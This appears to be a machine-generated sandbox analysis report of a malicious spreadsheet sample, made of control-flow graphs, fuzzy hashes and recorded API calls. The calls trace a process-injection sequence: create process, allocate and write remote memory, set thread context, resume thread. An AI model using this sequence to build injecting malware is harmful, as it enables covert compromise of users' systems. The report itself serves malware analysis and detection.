                                      control_flow_graph 33 2b02b28-2b02b59 34 2b02b60-2b02bd9 33->34 35 2b02b5b 33->35 37 2b02bf4-2b02bf8 34->37 35->34 38 2b02bfa-2b02c01 37->38 39 2b02bdb-2b02bed 37->39 41 2b035dd-2b035f4 38->41 39->37 40 2b02bef 39->40 40->37 42 2b02c06-2b02d67 call 2b021ec 41->42 43 2b035fa-2b03601 41->43 55 2b02d69-2b02da0 42->55 56 2b02dab-2b02e17 42->56 55->56 63 2b02e19 56->63 64 2b02e1e-2b02e44 56->64 63->64 66 2b02ef9-2b02f03 64->66 67 2b02e4a-2b02e5a call 2b021f8 64->67 69 2b02f05 66->69 70 2b02f0a-2b02f5c call 2b02210 66->70 71 2b02e5f-2b02e6c 67->71 69->70 78 2b02fa0-2b02fb9 70->78 79 2b02f5e-2b02f95 70->79 73 2b02e9e-2b02ea0 71->73 74 2b02e6e-2b02e9c call 2b02204 71->74 77 2b02ea6-2b02eb4 73->77 74->77 83 2b02eb6-2b02eed 77->83 84 2b02ef8 77->84 80 2b03032-2b030c1 call 2b02228 78->80 81 2b02fbb-2b02fed call 2b0221c 78->81 79->78 100 2b030c3-2b030fa 80->100 101 2b03105-2b0314f call 2b02234 80->101 90 2b03031 81->90 91 2b02fef-2b03026 81->91 83->84 84->66 90->80 91->90 100->101 107 2b03151-2b03188 101->107 108 2b03193-2b031c8 101->108 107->108 112 2b03346-2b03362 108->112 115 2b03368-2b033ce call 2b02234 112->115 116 2b031cd-2b03254 112->116 123 2b033d0-2b03407 115->123 124 2b03412-2b03443 115->124 126 2b0325a-2b032d1 call 2b02234 116->126 127 2b0333b-2b03340 116->127 123->124 130 2b03445 124->130 131 2b0344a-2b03475 124->131 142 2b032d6-2b032f6 126->142 127->112 130->131 137 2b03530-2b03539 call 2b02258 131->137 138 2b0347b-2b0348b call 2b02240 131->138 144 2b0353e-2b0355e 137->144 143 2b03490-2b0349d 138->143 145 2b032f8-2b0332f 142->145 146 2b0333a 142->146 147 2b034cf-2b034d1 143->147 148 2b0349f-2b034cd call 2b0224c 143->148 149 2b03560-2b03597 144->149 150 2b035a2-2b035d8 144->150 145->146 146->127 151 2b034d7-2b034eb 147->151 148->151 149->150 150->41 150->43 155 2b034ed-2b03524 151->155 156 2b0352f 151->156 155->156 156->137
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: (
                                      • API String ID: 3559483778-3887548279
                                      • Opcode ID: 63446995746fc1101d427521b0726ded35d1bc06871b108c2b45e56680f59762
                                      • Instruction ID: 0efac7f9c27fc958c4abd145f37cc93d98fb0e8da14e62a21960ce1128a088ca
                                      • Opcode Fuzzy Hash: 63446995746fc1101d427521b0726ded35d1bc06871b108c2b45e56680f59762
                                      • Instruction Fuzzy Hash: 7652C174E012288FDB65DF69C894BDDBBB2BF89300F1081EAD449AB294DB345E85CF54
                                      Function 02B011D8 Relevance: .3, Instructions: 287COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e01c3b67bb857e330b4a6f5a62b0cb6bc40b34d908bab05cb060825d97a8e872
                                      • Instruction ID: 3ecaffe838b0926d75b8af63ebdd86227a132b923b8309b1e65921e38256f23f
                                      • Opcode Fuzzy Hash: e01c3b67bb857e330b4a6f5a62b0cb6bc40b34d908bab05cb060825d97a8e872
                                      • Instruction Fuzzy Hash: 4BD1C374E10209CFCB19CFA9C584ADDBBB5FF89314F1492A9E409AB365D730A986CF50
                                      Function 02B0378D Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 166 2b0378d-2b03830 168 2b03832-2b0383c 166->168 169 2b03869-2b03889 166->169 168->169 170 2b0383e-2b03840 168->170 174 2b038c2-2b038f1 169->174 175 2b0388b-2b03895 169->175 172 2b03842-2b0384c 170->172 173 2b03863-2b03866 170->173 176 2b03850-2b0385f 172->176 177 2b0384e 172->177 173->169 185 2b038f3-2b038fd 174->185 186 2b0392a-2b039e0 CreateProcessA 174->186 175->174 179 2b03897-2b03899 175->179 176->176 178 2b03861 176->178 177->176 178->173 180 2b0389b-2b038a5 179->180 181 2b038bc-2b038bf 179->181 183 2b038a7 180->183 184 2b038a9-2b038b8 180->184 181->174 183->184 184->184 188 2b038ba 184->188 185->186 187 2b038ff-2b03901 185->187 196 2b039e2-2b039e8 186->196 197 2b039e9-2b03a64 186->197 189 2b03903-2b0390d 187->189 190 2b03924-2b03927 187->190 188->181 192 2b03911-2b03920 189->192 193 2b0390f 189->193 190->186 192->192 194 2b03922 192->194 193->192 194->190 196->197 206 2b03a74-2b03a78 197->206 207 2b03a66-2b03a6a 197->207 209 2b03a88-2b03a8c 206->209 210 2b03a7a-2b03a7e 206->210 207->206 208 2b03a6c-2b03a6f call 2b00bc0 207->208 208->206 213 2b03a9c-2b03aa0 209->213 214 2b03a8e-2b03a92 209->214 210->209 212 2b03a80-2b03a83 call 2b00bc0 210->212 212->209 216 2b03ab2-2b03ab9 213->216 217 2b03aa2-2b03aa8 213->217 214->213 215 2b03a94-2b03a97 call 2b00bc0 214->215 215->213 220 2b03ad0 216->220 221 2b03abb-2b03aca 216->221 217->216 223 2b03ad1 220->223 221->220 223->223
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 02B039CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 367a32ab282d7fe5a73f327d13039fbef85ba517e28d89fd844ca60778aa4c52
                                      • Instruction ID: d90369cbeeb2f51ea267150e5ba6cf0bfbbadd9e06fb0bc830bf51e664417dca
                                      • Opcode Fuzzy Hash: 367a32ab282d7fe5a73f327d13039fbef85ba517e28d89fd844ca60778aa4c52
                                      • Instruction Fuzzy Hash: 65A18971D00219DFDB21DFA9C88479DBBF2EF48304F1485EAE849A7290DB749985CF92
                                      Function 02B021EC Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 224 2b021ec-2b03830 227 2b03832-2b0383c 224->227 228 2b03869-2b03889 224->228 227->228 229 2b0383e-2b03840 227->229 233 2b038c2-2b038f1 228->233 234 2b0388b-2b03895 228->234 231 2b03842-2b0384c 229->231 232 2b03863-2b03866 229->232 235 2b03850-2b0385f 231->235 236 2b0384e 231->236 232->228 244 2b038f3-2b038fd 233->244 245 2b0392a-2b039e0 CreateProcessA 233->245 234->233 238 2b03897-2b03899 234->238 235->235 237 2b03861 235->237 236->235 237->232 239 2b0389b-2b038a5 238->239 240 2b038bc-2b038bf 238->240 242 2b038a7 239->242 243 2b038a9-2b038b8 239->243 240->233 242->243 243->243 247 2b038ba 243->247 244->245 246 2b038ff-2b03901 244->246 255 2b039e2-2b039e8 245->255 256 2b039e9-2b03a64 245->256 248 2b03903-2b0390d 246->248 249 2b03924-2b03927 246->249 247->240 251 2b03911-2b03920 248->251 252 2b0390f 248->252 249->245 251->251 253 2b03922 251->253 252->251 253->249 255->256 265 2b03a74-2b03a78 256->265 266 2b03a66-2b03a6a 256->266 268 2b03a88-2b03a8c 265->268 269 2b03a7a-2b03a7e 265->269 266->265 267 2b03a6c-2b03a6f call 2b00bc0 266->267 267->265 272 2b03a9c-2b03aa0 268->272 273 2b03a8e-2b03a92 268->273 269->268 271 2b03a80-2b03a83 call 2b00bc0 269->271 271->268 275 2b03ab2-2b03ab9 272->275 276 2b03aa2-2b03aa8 272->276 273->272 274 2b03a94-2b03a97 call 2b00bc0 273->274 274->272 279 2b03ad0 275->279 280 2b03abb-2b03aca 275->280 276->275 282 2b03ad1 279->282 280->279 282->282
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 02B039CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: f65d59d5c845aae3cae63db048b1b52eedbe04cd63a4415ed2579b58ec9e6799
                                      • Instruction ID: 4121fb9ec026a35c2204f1d0d6a92b2a4b4cf328ec9e91cdd33f97d009b2cf69
                                      • Opcode Fuzzy Hash: f65d59d5c845aae3cae63db048b1b52eedbe04cd63a4415ed2579b58ec9e6799
                                      • Instruction Fuzzy Hash: CA918A71D00619DFDB21DFA9C88479DBBF2EF48304F0485EAE849A7290DB749985CF92
                                      Function 02B02234 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 316 2b02234-2b03e31 319 2b03e41-2b03e7a WriteProcessMemory 316->319 320 2b03e33-2b03e3f 316->320 321 2b03e83-2b03eab 319->321 322 2b03e7c-2b03e82 319->322 320->319 322->321
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02B03E6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 1fd1eb3db56bed7a2dbc9e7a74f7c291afdd7dab6617560f030dc0e8aad4d10e
                                      • Instruction ID: c73f793ccd49a48fdb44aaa20c8c0512e1486af3c468da04f568e2d34cc21661
                                      • Opcode Fuzzy Hash: 1fd1eb3db56bed7a2dbc9e7a74f7c291afdd7dab6617560f030dc0e8aad4d10e
                                      • Instruction Fuzzy Hash: 212124B5900359DFCB10DF9AC889BDEBFF4FB48310F108569E958A7250D774A944CBA4
                                      Function 02B03DD8 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 325 2b03dd8-2b03e31 328 2b03e41-2b03e7a WriteProcessMemory 325->328 329 2b03e33-2b03e3f 325->329 330 2b03e83-2b03eab 328->330 331 2b03e7c-2b03e82 328->331 329->328 331->330
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02B03E6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 4e775413b371b111fbf642b44fdcfdaec53cdb68962d933afbad5905723ae072
                                      • Instruction ID: bfd3501947ac67c09a732db4799a36556de1d60098710e31f7fcd7f8505c0029
                                      • Opcode Fuzzy Hash: 4e775413b371b111fbf642b44fdcfdaec53cdb68962d933afbad5905723ae072
                                      • Instruction Fuzzy Hash: F82124B6900259DFCB10DF99D885BDEBFF4FB48310F10856AE958A7251D374A940CBA4
                                      Function 02B02210 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 334 2b02210-2b03ce4 ReadProcessMemory 337 2b03ce6-2b03cec 334->337 338 2b03ced-2b03d15 334->338 337->338
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02B03CD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 1e54c89e3fb21e861915cf221ceac2cc4cbfdac3601134a226ceaadf82371ea6
                                      • Instruction ID: 14ab60608854e4f45f2105d2d87b6d9a24ca1720d1b8db15ff8a3e9da18665a6
                                      • Opcode Fuzzy Hash: 1e54c89e3fb21e861915cf221ceac2cc4cbfdac3601134a226ceaadf82371ea6
                                      • Instruction Fuzzy Hash: 952114B5900359DFCB20DF9AD988ADEBBF4FB48310F108469E958A7250D335A944CFA4
                                      Function 02B02240 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 350 2b02240-2b03bdc 353 2b03be8-2b03c14 Wow64SetThreadContext 350->353 354 2b03bde-2b03be6 350->354 355 2b03c16-2b03c1c 353->355 356 2b03c1d-2b03c45 353->356 354->353 355->356
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(02D48130,00000000), ref: 02B03C07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 6c5a2e2660f074f2bbaeaedf791a2d2677dad62001433d579b3f2556b5cb8b5f
                                      • Instruction ID: 60cc1f845fda8fc67c182656cc40f58e5efce20070e9fe862f33e4d6d1b8f372
                                      • Opcode Fuzzy Hash: 6c5a2e2660f074f2bbaeaedf791a2d2677dad62001433d579b3f2556b5cb8b5f
                                      • Instruction Fuzzy Hash: A92138B1D006199BCB10DF9AC5887AEFBF4FB08314F1081AAD458B7241D374A944CFA5
                                      Function 02B03C51 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 359 2b03c51-2b03ce4 ReadProcessMemory 362 2b03ce6-2b03cec 359->362 363 2b03ced-2b03d15 359->363 362->363
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02B03CD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 0ca1358440616d2a056c4c46fcd78ae16395d52e38a89f272112b3edaa725da2
                                      • Instruction ID: 31e3f0c7638d10cde1c48eafd953172fd43ea0e42ff3db564cd843a3bad25d5a
                                      • Opcode Fuzzy Hash: 0ca1358440616d2a056c4c46fcd78ae16395d52e38a89f272112b3edaa725da2
                                      • Instruction Fuzzy Hash: 4E2123B6900359DFCB20DF9AC884ADEBFF4FB48320F10842AE958A7250D334A540CFA4
                                      Function 02B021F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 341 2b021f8-2b03bdc 344 2b03be8-2b03c14 Wow64SetThreadContext 341->344 345 2b03bde-2b03be6 341->345 346 2b03c16-2b03c1c 344->346 347 2b03c1d-2b03c45 344->347 345->344 346->347
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(02D48130,00000000), ref: 02B03C07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 04ad4a30b803f6dddcf2d48a735efab88b64021dd21344b3064eb6f600ff052a
                                      • Instruction ID: a379565422c01ae2f48d23e5a35ecd6e523d3171105f4caabab172146643641f
                                      • Opcode Fuzzy Hash: 04ad4a30b803f6dddcf2d48a735efab88b64021dd21344b3064eb6f600ff052a
                                      • Instruction Fuzzy Hash: ED2107B1D006599BCB10DF9AC5897AEFBF4EB08214F10816AD458A7251D374A9448FA5
                                      Function 02B03B89 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 366 2b03b89-2b03bdc 369 2b03be8-2b03c14 Wow64SetThreadContext 366->369 370 2b03bde-2b03be6 366->370 371 2b03c16-2b03c1c 369->371 372 2b03c1d-2b03c45 369->372 370->369 371->372
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(02D48130,00000000), ref: 02B03C07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 47e0564ec9207c14c2e0cb2de98d23c48b2487f2e84bcdeafb8ba04f114a9f0d
                                      • Instruction ID: 47b84166a89ebbbcff1c93fe1345f99369da93b8ae9ba2f552e3bf7c8d2eadc4
                                      • Opcode Fuzzy Hash: 47e0564ec9207c14c2e0cb2de98d23c48b2487f2e84bcdeafb8ba04f114a9f0d
                                      • Instruction Fuzzy Hash: 4B2147B2D006299FCB10DF9AC58579EFBF4FB08324F10816AD858B7341D378A9448FA1
                                      Function 02B02228 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 375 2b02228-2b03da0 VirtualAllocEx 378 2b03da2-2b03da8 375->378 379 2b03da9-2b03dc6 375->379 378->379
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02B03D93
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 9909ad8b48ee785e9928e8a488c2e5c3e2ff9a21586e8862fb099031d708ac4d
                                      • Instruction ID: d51059aa250c9643c28e37b7b08644e98de429bbc119d546778de1e3ab42dcca
                                      • Opcode Fuzzy Hash: 9909ad8b48ee785e9928e8a488c2e5c3e2ff9a21586e8862fb099031d708ac4d
                                      • Instruction Fuzzy Hash: AB1137B5900258DFCB20DF9AD888BDEBFF4EB48320F108459E558A7260C775A940CFA0
                                      Function 02B03D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 382 2b03d20-2b03d63 383 2b03d6b-2b03da0 VirtualAllocEx 382->383 384 2b03da2-2b03da8 383->384 385 2b03da9-2b03dc6 383->385 384->385
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02B03D93
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: c36c69e8f50674dc8bf0bda40cae57e033865bfad5316a2721ee5944112f63ae
                                      • Instruction ID: 54df5088f3e9231c1ef4b736abf3c0cb150bbfa7983ba54b7464e154f7c065a5
                                      • Opcode Fuzzy Hash: c36c69e8f50674dc8bf0bda40cae57e033865bfad5316a2721ee5944112f63ae
                                      • Instruction Fuzzy Hash: 131126B5900248DFCB20DF99D548ADEBFF4EF48320F20846AE558A7260C775A940CFA0
                                      Function 02B02258 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ResumeThread.KERNEL32(02D48130), ref: 02B03F1F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 519e9716923709174b2b528e40342d1fc39aaf4e8acbf4c3832fdddda61689cb
                                      • Instruction ID: 13ff8ac337835592d6cdc7b95935c4d05191595c3b7af8b5bef4b45543af3815
                                      • Opcode Fuzzy Hash: 519e9716923709174b2b528e40342d1fc39aaf4e8acbf4c3832fdddda61689cb
                                      • Instruction Fuzzy Hash: 241125B5904249CFCB20DF9AD488BDEFFF4EB48324F208499D558A7250C774A944CFA5
                                      Function 02B03EB9 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ResumeThread.KERNEL32(02D48130), ref: 02B03F1F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 308944077482ad66a28a9f647d94d083c1dd53006435cc028d271c85da147d26
                                      • Instruction ID: 34fca4eaadda7219038140d2e261d691156400dfdc15b60620b6c7421da95434
                                      • Opcode Fuzzy Hash: 308944077482ad66a28a9f647d94d083c1dd53006435cc028d271c85da147d26
                                      • Instruction Fuzzy Hash: 8C1122B5900248CFCB20DF9AD888BDEFFF4EB48324F20845AD558A7250C774A944CFA5
                                      Function 0107D76D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783395444.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_107d000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 633305d1ae79a510643a9a274202806a9a44ecbf357b452d7e2e6096f0bdec99
                                      • Instruction ID: 242807cdc00fa7161fbdfca1eae2fa6b74ac60ff8771679a08acd7b5a9ea93b5
                                      • Opcode Fuzzy Hash: 633305d1ae79a510643a9a274202806a9a44ecbf357b452d7e2e6096f0bdec99
                                      • Instruction Fuzzy Hash: 20012B715083849AE7114B59CDC4767FFD8FF41324F18C46AED490A186D238D840CB75
                                      Function 0107D76C Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783395444.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_107d000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d5df4ccefed2bd6622a737238f544bbbd41426e86c11d7fede825227a7fa90a1
                                      • Instruction ID: 672b9df7bfc148826eab3a5d815ec29273185c2154ba432e392abdef03a5f893
                                      • Opcode Fuzzy Hash: d5df4ccefed2bd6622a737238f544bbbd41426e86c11d7fede825227a7fa90a1
                                      • Instruction Fuzzy Hash: 7FF062715083849EE7218A1AD8C4B62FFE8FF41624F18C45AED484A296D2799844CB71

                                      Non-executed Functions

                                      Function 02B02B21 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1783814948.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2b00000_rDoc5633276235623657_xls.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 850467ca83ee76934468b6f9aea471f2dfdb9dd19d1880d909ae44fcb49d50d7
                                      • Instruction ID: 733ddccea6c09962a5b3c65087151c67bcd8ff90c806cb40d4ee30f6013f0e69
                                      • Opcode Fuzzy Hash: 850467ca83ee76934468b6f9aea471f2dfdb9dd19d1880d909ae44fcb49d50d7
                                      • Instruction Fuzzy Hash: 8E2189B1D056288BEB69CF6B8C043DAFAF7AFC8304F04C1BAC408A6254EB740645CF41

                                      Execution Graph

                                      Execution Coverage:13.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:66
                                      Total number of Limit Nodes:10
                                      execution_graph 40296 1335a50 40297 1335a94 RtlSetProcessIsCritical 40296->40297 40298 1335af1 40297->40298 40299 1335c80 40300 1335c84 40299->40300 40303 1335e02 40300->40303 40308 1335f18 40300->40308 40305 1335e3c 40303->40305 40304 1335f41 40304->40300 40305->40304 40313 1335fb0 40305->40313 40317 1335f9f 40305->40317 40310 1335eef 40308->40310 40309 1335f41 40309->40300 40310->40309 40311 1335fb0 3 API calls 40310->40311 40312 1335f9f 3 API calls 40310->40312 40311->40310 40312->40310 40314 1335fd5 40313->40314 40321 1336812 40314->40321 40315 13360b6 40318 1335fd5 40317->40318 40320 1336812 3 API calls 40318->40320 40319 13360b6 40319->40319 40320->40319 40322 1336835 40321->40322 40329 133b402 40322->40329 40335 133b480 40322->40335 40340 133b4a0 40322->40340 40345 133b580 40322->40345 40349 133b570 40322->40349 40323 1336a90 40323->40315 40330 133b405 40329->40330 40331 133b476 40329->40331 40332 133b4fc 40331->40332 40353 133b818 40331->40353 40332->40323 40333 133b607 40333->40323 40336 133b485 40335->40336 40338 133b4fc 40336->40338 40339 133b818 3 API calls 40336->40339 40337 133b607 40337->40323 40338->40323 40339->40337 40341 133b4be 40340->40341 40342 133b4fc 40341->40342 40344 133b818 3 API calls 40341->40344 40342->40323 40343 133b607 40343->40323 40344->40343 40346 133b5a5 40345->40346 40348 133b818 3 API calls 40346->40348 40347 133b607 40347->40323 40348->40347 40350 133b5a5 40349->40350 40352 133b818 3 API calls 40350->40352 40351 133b607 40351->40323 40352->40351 40357 133b851 40353->40357 40365 133b860 40353->40365 40354 133b836 40354->40333 40358 133b895 40357->40358 40359 133b86d 40357->40359 40374 133b2f0 40358->40374 40359->40354 40361 133b8b6 40361->40354 40363 133b97e GlobalMemoryStatusEx 40364 133b9ae 40363->40364 40364->40354 40366 133b895 40365->40366 40367 133b86d 40365->40367 40368 133b2f0 GlobalMemoryStatusEx 40366->40368 40367->40354 40371 133b8b2 40368->40371 40369 133b8b6 40369->40354 40370 133b91b 40370->40354 40371->40369 40371->40370 40372 133b97e GlobalMemoryStatusEx 40371->40372 40373 133b9ae 40372->40373 40373->40354 40375 133b938 GlobalMemoryStatusEx 40374->40375 40377 133b8b2 40375->40377 40377->40361 40377->40363

                                      Executed Functions

                                      Function 06684A18 Relevance: 9.1, Strings: 7, Instructions: 336COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
